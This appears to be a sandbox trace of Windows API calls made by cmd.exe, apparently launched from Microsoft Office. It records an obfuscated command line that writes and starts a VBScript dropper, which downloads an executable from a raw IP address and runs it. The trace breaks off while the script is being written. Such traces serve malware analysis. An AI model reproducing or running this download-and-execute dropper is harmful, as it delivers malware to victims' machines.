[0083.785] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c CD %temp% & @echo set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"wscript.shell\") >ZMXZAA.vBS & @echo Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x >>ZMXZAA.vBS & @echo Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w >>ZMXZAA.vBS & @echo Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e >>ZMXZAA.vBS & @echo Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i >>ZMXZAA.vBS & @echo X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"http://82.118.242.107/~able/1_ga/al/al.exe\" >>ZMXZAA.vBS & @echo R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"JSTCHV.eXe\" >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"MSXML2.XMLHTTP\") >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"GET\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\") >>ZMXZAA.vBS & @echo If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then >>ZMXZAA.vBS & @echo Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"ADODB.Stream\") >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close >>ZMXZAA.vBS & @echo Set nE= Nothing >>ZMXZAA.vBS & @echo End If >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing >>ZMXZAA.vBS & @echo WScript.Sleep(5000) >>ZMXZAA.VBs& @echo H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) >>ZMXZAA.vBS & sTaRt ZMXZAA.vbs "
[0083.785] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c CD %temp% & @echo set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"wscript.shell\") >ZMXZAA.vBS & @echo Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x >>ZMXZAA.vBS & @echo Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w >>ZMXZAA.vBS & @echo Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e >>ZMXZAA.vBS & @echo Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i >>ZMXZAA.vBS & @echo X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"http://82.118.242.107/~able/1_ga/al/al.exe\" >>ZMXZAA.vBS & @echo R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"JSTCHV.eXe\" >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"MSXML2.XMLHTTP\") >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"GET\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\") >>ZMXZAA.vBS & @echo If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then >>ZMXZAA.vBS & @echo Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"ADODB.Stream\") >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close >>ZMXZAA.vBS & @echo Set nE= Nothing >>ZMXZAA.vBS & @echo End If >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing >>ZMXZAA.vBS & @echo WScript.Sleep(5000) >>ZMXZAA.VBs& @echo H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) >>ZMXZAA.vBS & sTaRt ZMXZAA.vbs "
[0083.785] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab55260 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Root\\Office16") returned 0x2f
[0083.786] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b5bc8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b
[0083.786] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab60640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0xbf
[0083.786] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab60640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
[0083.786] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab60640, nSize=0x2000 | out: lpBuffer="") returned 0x0
[0083.786] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
[0083.786] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
[0083.786] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
[0083.786] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
[0083.786] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
[0083.786] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
[0083.786] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
[0083.786] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
[0083.786] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
[0083.786] GetEnvironmentStringsW () returned 0x3b3928*
[0083.787] FreeEnvironmentStringsW (penv=0x3b3928) returned 1
[0083.787] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab60640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0083.787] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ab60640, nSize=0x2000 | out: lpBuffer="") returned 0x0
[0083.787] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
[0083.787] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
[0083.787] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
[0083.787] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
[0083.787] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
[0083.787] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
[0083.787] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
[0083.787] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
[0083.787] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x39f7c0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Root\\Office16") returned 0x2f
[0083.787] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Root\\Office16", nBufferLength=0x104, lpBuffer=0x39f7c0, lpFilePart=0x39f7bc | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Root\\Office16", lpFilePart=0x39f7bc*="Office16") returned 0x2f
[0083.787] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Root\\Office16" (normalized: "c:\\program files\\microsoft office\\root\\office16")) returned 0x10
[0083.787] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x39f53c | out: lpFindFileData=0x39f53c) returned 0x3b37a8
[0083.787] FindClose (in: hFindFile=0x3b37a8 | out: hFindFile=0x3b37a8) returned 1
[0083.787] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17
[0083.787] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office", lpFindFileData=0x39f53c | out: lpFindFileData=0x39f53c) returned 0x3b37a8
[0083.787] FindClose (in: hFindFile=0x3b37a8 | out: hFindFile=0x3b37a8) returned 1
[0083.787] _wcsnicmp (_String1="MICROS~2", _String2="Microsoft Office", _MaxCount=0x10) returned 15
[0083.788] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Root", lpFindFileData=0x39f53c | out: lpFindFileData=0x39f53c) returned 0x3b37a8
[0083.788] FindClose (in: hFindFile=0x3b37a8 | out: hFindFile=0x3b37a8) returned 1
[0083.788] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16", lpFindFileData=0x39f53c | out: lpFindFileData=0x39f53c) returned 0x3b37a8
[0083.788] FindClose (in: hFindFile=0x3b37a8 | out: hFindFile=0x3b37a8) returned 1
[0083.788] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16" (normalized: "c:\\program files\\microsoft office\\root\\office16")) returned 0x10
[0083.788] SetCurrentDirectoryW (lpPathName="C:\\Program Files\\Microsoft Office\\root\\Office16" (normalized: "c:\\program files\\microsoft office\\root\\office16")) returned 1
[0083.788] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Program Files\\Microsoft Office\\root\\Office16") returned 1
[0083.788] GetEnvironmentStringsW () returned 0x3b5dd8*
[0083.788] FreeEnvironmentStringsW (penv=0x3b5dd8) returned 1
[0083.788] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab55260 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Root\\Office16") returned 0x2f
[0083.789] GetConsoleOutputCP () returned 0x1b5
[0083.790] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab54260 | out: lpCPInfo=0x4ab54260) returned 1
[0083.790] GetUserDefaultLCID () returned 0x409
[0083.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ab54950, cchData=8 | out: lpLCData=":") returned 2
[0083.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x39f900, cchData=128 | out: lpLCData="0") returned 2
[0083.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x39f900, cchData=128 | out: lpLCData="0") returned 2
[0083.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x39f900, cchData=128 | out: lpLCData="1") returned 2
[0083.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ab54940, cchData=8 | out: lpLCData="/") returned 2
[0083.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ab54d80, cchData=32 | out: lpLCData="Mon") returned 4
[0083.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ab54d40, cchData=32 | out: lpLCData="Tue") returned 4
[0083.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ab54d00, cchData=32 | out: lpLCData="Wed") returned 4
[0083.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ab54cc0, cchData=32 | out: lpLCData="Thu") returned 4
[0083.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ab54c80, cchData=32 | out: lpLCData="Fri") returned 4
[0083.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ab54c40, cchData=32 | out: lpLCData="Sat") returned 4
[0083.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ab54c00, cchData=32 | out: lpLCData="Sun") returned 4
[0083.791] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ab54930, cchData=8 | out: lpLCData=".") returned 2
[0083.791] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ab54920, cchData=8 | out: lpLCData=",") returned 2
[0083.791] setlocale (category=0, locale=".OCP") returned="English_United States.437"
[0083.792] GetConsoleTitleW (in: lpConsoleTitle=0x3bd8b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0083.792] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000
[0083.792] GetProcAddress (hModule=0x76220000, lpProcName="CopyFileExW") returned 0x76253b92
[0083.792] GetProcAddress (hModule=0x76220000, lpProcName="IsDebuggerPresent") returned 0x76234a5d
[0083.792] GetProcAddress (hModule=0x76220000, lpProcName="SetConsoleInputExeNameW") returned 0x7624a79d
[0083.793] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ab60640, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
[0083.793] _wcsicmp (_String1="CD", _String2=")") returned 58
[0083.793] _wcsicmp (_String1="FOR", _String2="CD") returned 3
[0083.793] _wcsicmp (_String1="FOR/?", _String2="CD") returned 3
[0083.793] _wcsicmp (_String1="IF", _String2="CD") returned 6
[0083.793] _wcsicmp (_String1="IF/?", _String2="CD") returned 6
[0083.793] _wcsicmp (_String1="REM", _String2="CD") returned 15
[0083.793] _wcsicmp (_String1="REM/?", _String2="CD") returned 15
[0083.795] _wcsicmp (_String1="echo", _String2=")") returned 60
[0083.795] _wcsicmp (_String1="FOR", _String2="echo") returned 1
[0083.795] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1
[0083.795] _wcsicmp (_String1="IF", _String2="echo") returned 4
[0083.795] _wcsicmp (_String1="IF/?", _String2="echo") returned 4
[0083.795] _wcsicmp (_String1="REM", _String2="echo") returned 13
[0083.795] _wcsicmp (_String1="REM/?", _String2="echo") returned 13
[0083.799] _wcsicmp (_String1="echo", _String2=")") returned 60
[0083.799] _wcsicmp (_String1="FOR", _String2="echo") returned 1
[0083.799] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1
[0083.799] _wcsicmp (_String1="IF", _String2="echo") returned 4
[0083.799] _wcsicmp (_String1="IF/?", _String2="echo") returned 4
[0083.799] _wcsicmp (_String1="REM", _String2="echo") returned 13
[0083.799] _wcsicmp (_String1="REM/?", _String2="echo") returned 13
[0083.803] _wcsicmp (_String1="echo", _String2=")") returned 60
[0083.803] _wcsicmp (_String1="FOR", _String2="echo") returned 1
[0083.803] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1
[0083.803] _wcsicmp (_String1="IF", _String2="echo") returned 4
[0083.803] _wcsicmp (_String1="IF/?", _String2="echo") returned 4
[0083.803] _wcsicmp (_String1="REM", _String2="echo") returned 13
[0083.803] _wcsicmp (_String1="REM/?", _String2="echo") returned 13
[0083.826] GetConsoleTitleW (in: lpConsoleTitle=0x39f594, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0083.866] _wcsicmp (_String1="CD", _String2="DIR") returned -1
[0083.866] _wcsicmp (_String1="CD", _String2="ERASE") returned -2
[0083.866] _wcsicmp (_String1="CD", _String2="DEL") returned -1
[0083.866] _wcsicmp (_String1="CD", _String2="TYPE") returned -17
[0083.866] _wcsicmp (_String1="CD", _String2="COPY") returned -11
[0083.866] _wcsicmp (_String1="CD", _String2="CD") returned 0
[0083.867] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0083.867] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0083.868] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x39f350, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x39f348, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x39f348*=0x705ba84c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
[0083.868] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x39f0f4 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Root\\Office16") returned 0x2f
[0083.868] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x39f0f4, lpFilePart=0x39f0f0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp", lpFilePart=0x39f0f0*="Temp") returned 0x24
[0083.869] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp")) returned 0x2010
[0083.869] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x39ee70 | out: lpFindFileData=0x39ee70) returned 0x3bc470
[0083.869] FindClose (in: hFindFile=0x3bc470 | out: hFindFile=0x3bc470) returned 1
[0083.869] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x39ee70 | out: lpFindFileData=0x39ee70) returned 0x3bc470
[0083.869] FindClose (in: hFindFile=0x3bc470 | out: hFindFile=0x3bc470) returned 1
[0083.869] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData", lpFindFileData=0x39ee70 | out: lpFindFileData=0x39ee70) returned 0x3bc470
[0083.869] FindClose (in: hFindFile=0x3bc470 | out: hFindFile=0x3bc470) returned 1
[0083.869] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local", lpFindFileData=0x39ee70 | out: lpFindFileData=0x39ee70) returned 0x3bc470
[0083.869] FindClose (in: hFindFile=0x3bc470 | out: hFindFile=0x3bc470) returned 1
[0083.869] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp", lpFindFileData=0x39ee70 | out: lpFindFileData=0x39ee70) returned 0x3bc470
[0083.870] FindClose (in: hFindFile=0x3bc470 | out: hFindFile=0x3bc470) returned 1
[0083.870] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp")) returned 0x2010
[0083.870] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp")) returned 1
[0083.870] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 1
[0083.870] GetEnvironmentStringsW () returned 0x3b7d88*
[0083.870] FreeEnvironmentStringsW (penv=0x3b7d88) returned 1
[0083.870] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab55260 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
[0083.870] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.870] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.870] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.870] GetFileType (hFile=0x7) returned 0x2
[0083.871] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0083.871] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39f6d0 | out: lpMode=0x39f6d0) returned 1
[0083.888] _dup (_FileHandle=1) returned 3
[0083.888] _close (_FileHandle=1) returned 0
[0083.889] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0083.889] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x39f6a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0083.889] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0083.889] GetConsoleTitleW (in: lpConsoleTitle=0x39f4d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0083.889] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0083.889] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0083.889] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0083.889] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0083.897] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0083.901] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0083.901] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0083.901] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0083.901] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0083.901] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0083.902] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39f498 | out: _Buffer="set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"wscript.shell\") \r\n") returned 73
[0083.902] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.902] GetFileType (hFile=0x1c) returned 0x1
[0083.902] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.903] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"wscript.shell\") \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"wscript.shell\") \r\n", lpUsedDefaultChar=0x0) returned 74
[0083.903] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x39f484, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39f484*=0x49, lpOverlapped=0x0) returned 1
[0083.904] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0083.904] _close (_FileHandle=3) returned 0
[0083.904] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.904] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.904] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.904] GetFileType (hFile=0x7) returned 0x2
[0083.905] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0083.905] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39f60c | out: lpMode=0x39f60c) returned 1
[0083.905] _dup (_FileHandle=1) returned 3
[0083.905] _close (_FileHandle=1) returned 0
[0083.905] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0083.905] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39f5dc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0083.905] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0083.905] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.905] GetFileType (hFile=0x1c) returned 0x1
[0083.905] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x49
[0083.905] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39f5f4*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39f5f4*=0) returned 0x48
[0083.906] ReadFile (in: hFile=0x1c, lpBuffer=0x39f5ec, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39f5e8, lpOverlapped=0x0 | out: lpBuffer=0x39f5ec*, lpNumberOfBytesRead=0x39f5e8*=0x1, lpOverlapped=0x0) returned 1
[0083.906] GetConsoleTitleW (in: lpConsoleTitle=0x39f40c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0083.906] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39f3d4 | out: _Buffer="Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x \r\n") returned 53
[0083.906] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.906] GetFileType (hFile=0x1c) returned 0x1
[0083.906] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.906] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x \r\n", lpUsedDefaultChar=0x0) returned 54
[0083.906] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x39f3c0, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39f3c0*=0x35, lpOverlapped=0x0) returned 1
[0083.906] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0083.907] _close (_FileHandle=3) returned 0
[0083.907] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.907] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.907] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.907] GetFileType (hFile=0x7) returned 0x2
[0083.907] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0083.907] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39f548 | out: lpMode=0x39f548) returned 1
[0083.907] _dup (_FileHandle=1) returned 3
[0083.908] _close (_FileHandle=1) returned 0
[0083.908] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0083.908] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39f518, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0083.908] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0083.908] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.908] GetFileType (hFile=0x1c) returned 0x1
[0083.908] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7e
[0083.908] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39f530*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39f530*=0) returned 0x7d
